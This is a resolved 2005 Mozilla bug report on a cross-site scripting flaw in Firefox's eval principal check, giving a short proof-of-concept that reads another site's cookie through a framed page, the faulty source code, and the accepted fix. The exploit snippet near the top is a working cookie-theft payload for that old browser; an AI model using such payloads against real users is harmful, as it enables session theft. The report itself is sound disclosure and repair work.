300867 - cross-site scripting by frames[0].location.eval(code, frames[0])

Status: RESOLVED FIXED

(Core :: Security, defect, P1)

Description

[moz_bug_r_a4]

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.9) Gecko/20050714 Firefox/1.0.5

The security check for obj.eval(code, obj) has problem.
This is related to Bug 300008.

Exploit:

  <script>
  function a() {
	var code = "alert(location.href + '\\nCookie: ' + document.cookie);";
	frames[0].location.eval(code, frames[0]);
  }
  </script>

  <iframe src="http://www.yahoo.com/" onload="a();"></iframe>


-----
http://lxr.mozilla.org/aviary101branch/source/js/src/jsdbgapi.c#668

668 JS_PUBLIC_API(JSPrincipals *)
669 JS_EvalFramePrincipals(JSContext *cx, JSStackFrame *fp, JSStackFrame *caller)
670 {
671     JSObject *callee;
672     JSPrincipals *principals, *callerPrincipals;
673 
674     if (cx->findObjectPrincipals) {
675         callee = JSVAL_TO_OBJECT(fp->argv[-2]);
676         principals = cx->findObjectPrincipals(cx, callee);
677     } else {
678         principals = NULL;
679     }
680     if (!caller)
681         return principals;
682     callerPrincipals = JS_StackFramePrincipals(cx, caller);
683     return (principals && callerPrincipals &&
684             principals->subsume(principals, callerPrincipals))
685            ? callerPrincipals
686            : principals;
687 }

If my understanding is correct...
When eval's principal is not equal to caller's principal and neither eval's 
principal nor caller's principal is the system principal, JS_EvalFramePrincipals
returns eval's principal because eval's principal does not subsume caller's 
principal (and vice versa). In this case, if JS_EvalFramePrincipals returned 
caller's principal, the security check probably could work good.


     return (principals && callerPrincipals &&
             principals->subsume(principals, callerPrincipals))
            ? callerPrincipals
            : principals;

Is the above code able to be replaced with the following code?

     return (principals && callerPrincipals &&
             callerPrincipals->subsume(callerPrincipals, principals))
            ? principals
            : callerPrincipals;


And, this change could stop Bug 297543 comment 18 attachment 188804 [details], I guess.


Reproducible: Always

Steps to Reproduce:

Comment 1

[moz_bug_r_a4]

Attachment: testcase - steal cookie

This works on:
Firefox/1.0.5 2005-07-14-04
Firefox/1.0+  2005-07-14-06
Mozilla/1.7.9 2005-07-14-08

Comment 2

[Brendan Eich [:brendan]]

Thanks for finding this.  I assumed that if eval's principals didn't subsume the
caller's principals, then eval's were the right ones to use, because otherwise
the caller should never have been able to access that eval.  Your fix is good,
it does not make this incorrect assumption.

Why is the assumption incorrect?  jst, anyone: why can the exploit call eval on
the location object of another origin's frame?  Shouldn't eval and everything
but href be protected by same-origin?

This needs to be fixed for the branches and the trunk.

/be

Comment 3

[Brendan Eich [:brendan]]

Attachment: the fix given by moz_bug_r_a4

r+a=me.  I'm about to check in everywhere.

/be

Comment 4

[timeless]

perhaps it relates to the interface defined location.assign() and the implicit
location= [which we broke recently that maps to .assign]?

Comment 5

[Brendan Eich [:brendan]]

Timeless: what are you talking about, exactly?  Please cite a bug.

Fix checked into trunk and branches.  Thanks again, moz_bug_r_a4.  I should have
seen this one.

/be